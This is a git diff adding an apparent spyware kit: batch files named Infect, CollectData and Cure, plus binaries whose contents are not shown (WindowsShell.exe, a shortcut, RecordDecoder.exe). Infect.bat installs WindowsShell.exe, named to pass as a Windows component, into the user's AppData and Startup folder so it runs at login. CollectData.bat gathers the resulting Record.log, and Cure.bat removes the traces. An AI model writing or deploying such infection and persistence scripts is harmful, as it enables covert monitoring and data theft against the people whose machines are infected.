diff --git a/CollectData.bat b/CollectData.bat
new file mode 100644
index 0000000..35f4869
--- /dev/null
+++ b/CollectData.bat
@@ -0,0 +1 @@
+copy %appdata%\Record.log
\ No newline at end of file
diff --git a/Cure.bat b/Cure.bat
new file mode 100644
index 0000000..78dc19c
--- /dev/null
+++ b/Cure.bat
@@ -0,0 +1,4 @@
+del "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsShell.lnk"
+del %appdata%\Record.log
+TASKKILL /F /IM WindowsShell.exe /T
+del %appdata%\WindowsShell.exe
\ No newline at end of file
diff --git a/Infect.bat b/Infect.bat
new file mode 100644
index 0000000..6a258a0
--- /dev/null
+++ b/Infect.bat
@@ -0,0 +1,2 @@
+copy WindowsShell.exe %appdata%
+copy WindowsShell.lnk "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
\ No newline at end of file
diff --git a/RecordDecoder.exe b/RecordDecoder.exe
new file mode 100644
index 0000000..2027445
Binary files /dev/null and b/RecordDecoder.exe differ
diff --git a/WindowsShell.exe b/WindowsShell.exe
new file mode 100644
index 0000000..ffea3c2
Binary files /dev/null and b/WindowsShell.exe differ
diff --git a/WindowsShell.lnk b/WindowsShell.lnk
new file mode 100644
index 0000000..b49b039
Binary files /dev/null and b/WindowsShell.lnk differ